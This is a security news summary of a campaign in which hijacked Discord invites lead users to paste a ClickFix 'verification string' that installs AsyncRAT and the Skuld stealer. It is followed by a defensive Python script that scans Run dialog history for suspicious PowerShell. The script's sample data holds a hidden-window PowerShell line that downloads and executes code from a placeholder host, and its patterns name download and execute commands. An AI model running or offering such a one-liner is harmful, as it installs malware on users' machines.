Threat actors have been taking over expired or deleted Discord invite links to deploy malicious payloads as part of a new attack campaign, according to The Hacker News.
Hijacked invite links redirected users to malicious servers that lured them into completing a verification procedure that would allow full server access, which in turn redirected them to another website with a "Verify" button, a report from Check Point Research showed. The attackers then used the ClickFix technique: users who clicked the button were asked to execute a copied "verification string" in the Windows Run dialog. Doing so deployed a PowerShell script that executed an initial-stage downloader, which distributed the AsyncRAT trojan and the Golang-based Skuld information-stealing malware, allowing remote control and cryptocurrency wallet compromise, respectively. The U.S., Vietnam, France, Germany, and Slovakia were most impacted by the attacks. "The choice of payloads, including a powerful stealer specifically targeting cryptocurrency wallets, suggests that the attackers are primarily focused on crypto users and motivated by financial gain," the researchers said.
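For responders checking whether a user ran such a "verification string", the following is an added example and not code from The Hacker News or Check Point Research. It triages values exported from a user's Run dialog history (the `RunMRU` registry key under `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer`) for PowerShell launches; the heuristics and sample values are assumptions constructed for illustration, not indicators from the report.

```python
import re

# Heuristics are assumptions chosen for this example, not indicators from the report.
SHELL = re.compile(r"\b(powershell|pwsh)(\.exe)?\b", re.I)
SIGNALS = {
    "hidden_window": re.compile(r"-w(in(dowstyle)?)?\s+h(idden)?\b", re.I),
    "encoded_command": re.compile(r"\s-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{16,}", re.I),
    "download": re.compile(
        r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile)\b", re.I),
    "remote_url": re.compile(r"https?://", re.I),
    "invoke_expression": re.compile(r"\b(iex|invoke-expression)\b", re.I),
}

def normalize(value):
    """RunMRU stores each typed command with a trailing '\\1' marker; strip it."""
    return value[:-2] if value.endswith("\\1") else value

def triage_runmru(values):
    """Return [(value_name, command, [signals])] for entries that start
    PowerShell and show at least one further signal."""
    findings = []
    for name, raw in sorted(values.items()):
        if name == "MRUList":  # ordering string, not a command
            continue
        cmd = normalize(raw)
        if not SHELL.search(cmd):
            continue
        hits = [label for label, rx in SIGNALS.items() if rx.search(cmd)]
        if hits:
            findings.append((name, cmd, hits))
    return findings

# Constructed sample values, shaped like an export of a user's RunMRU key.
SAMPLE = {
    "MRUList": "cba",
    "a": "cmd\\1",
    "b": "powershell -w hidden -c \"iex (irm https://example.invalid/v)\"\\1",
    "c": "powershell\\1",
}

if __name__ == "__main__":
    for name, cmd, hits in triage_runmru(SAMPLE):
        print(f"{name}: {', '.join(hits)} :: {cmd}")
```

A hit is a lead for review, not a verdict: administrators legitimately start PowerShell from the Run dialog, and the history is per user and can be cleared.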